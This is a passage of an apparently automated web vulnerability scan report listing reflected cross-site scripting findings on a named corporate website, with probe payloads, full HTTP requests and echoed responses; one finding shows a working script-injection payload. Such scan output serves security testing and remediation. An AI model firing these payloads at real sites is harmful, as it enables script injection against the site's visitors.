Last-Modified: Wed, 17 Nov 2010 00:22:46 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40296
Date: Wed, 17 Nov 2010 00:22:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/factsheets94e05";23fa5ff016e/fc_Security-Solutions-for-Retail";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.779. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f980d"%3b9334d9d4d9 was submitted in the REST URL parameter 3. This input was echoed as f980d";9334d9d4d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets/fc_Security-Solutions-for-Retailf980d"%3b9334d9d4d9 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40296
Date: Wed, 17 Nov 2010 00:23:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/factsheets/fc_Security-Solutions-for-Retailf980d";9334d9d4d9";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.780. http://www.verizonbusiness.com/resources/factsheets/fc_Security-Solutions-for-Retail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/factsheets/fc_Security-Solutions-for-Retail

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17756'%3b86436e957b6 was submitted in the REST URL parameter 3. This input was echoed as 17756';86436e957b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/factsheets/fc_Security-Solutions-for-Retail17756'%3b86436e957b6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40296
Date: Wed, 17 Nov 2010 00:23:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/factsheets/fc_Security-Solutions-for-Retail17756';86436e957b6'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.781. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acc8a'%3b989fc9833fd was submitted in the REST URL parameter 1. This input was echoed as acc8a';989fc9833fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesacc8a'%3b989fc9833fd/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesacc8a';989fc9833fd/media/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.782. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138e6"%3bd589f0b49a9 was submitted in the REST URL parameter 1. This input was echoed as 138e6";d589f0b49a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources138e6"%3bd589f0b49a9/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:53 GMT
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources138e6";d589f0b49a9/media/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.783. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28a0d'%3bed9d86ee0d6 was submitted in the REST URL parameter 2. This input was echoed as 28a0d';ed9d86ee0d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media28a0d'%3bed9d86ee0d6/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media28a0d';ed9d86ee0d6/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.784. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6926f"%3b286bf2b63b7 was submitted in the REST URL parameter 2. This input was echoed as 6926f";286bf2b63b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media6926f"%3b286bf2b63b7/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media6926f";286bf2b63b7/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.785. http://www.verizonbusiness.com/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ee41</script><script>alert(1)</script>e0ba20b73a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/index-131046-wifi+shopping+borders.xml3ee41</script><script>alert(1)</script>e0ba20b73a0 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "f80a741cbae3686cc86be338fb08d02b"
Last-Modified: Wed, 17 Nov 2010 00:05:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21304
Date: Wed, 17 Nov 2010 00:05:43 GMT
Connection: close
Set-Cookie: BERT=VRID%3d3a9413df-40dd-4ddb-b6fa-fa541ff67c82|VTID%3d8c0efedf-ba1b-43f7-a1de-e3c30f37fa47|SX%3d1289953542|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:09:26 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:05:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<url>/resources/media/index-131046-wifi+shopping+borders.xml3ee41</script><script>alert(1)</script>e0ba20b73a0</url>
...[SNIP]...

1.786. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8655d"%3bf0bb820239a was submitted in the REST URL parameter 1. This input was echoed as 8655d";f0bb820239a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8655d"%3bf0bb820239a/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8655d";f0bb820239a/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.787. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd429'%3b22d12cfda25 was submitted in the REST URL parameter 1. This input was echoed as cd429';22d12cfda25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescd429'%3b22d12cfda25/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcescd429';22d12cfda25/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.788. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b32d"%3b59180184350 was submitted in the REST URL parameter 2. This input was echoed as 2b32d";59180184350 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media2b32d"%3b59180184350/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:03 GMT
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media2b32d";59180184350/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.789. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 107f9'%3bc46e19b26b1 was submitted in the REST URL parameter 2. This input was echoed as 107f9';c46e19b26b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media107f9'%3bc46e19b26b1/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media107f9';c46e19b26b1/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.790. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec1e"%3b7c09e426ee6 was submitted in the REST URL parameter 3. This input was echoed as 1ec1e";7c09e426ee6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/index.xml1ec1e"%3b7c09e426ee6?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 38181
Date: Wed, 17 Nov 2010 00:05:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media/index.xml1ec1e";7c09e426ee6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.791. http://www.verizonbusiness.com/resources/media/index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/index.xml

Issue detail

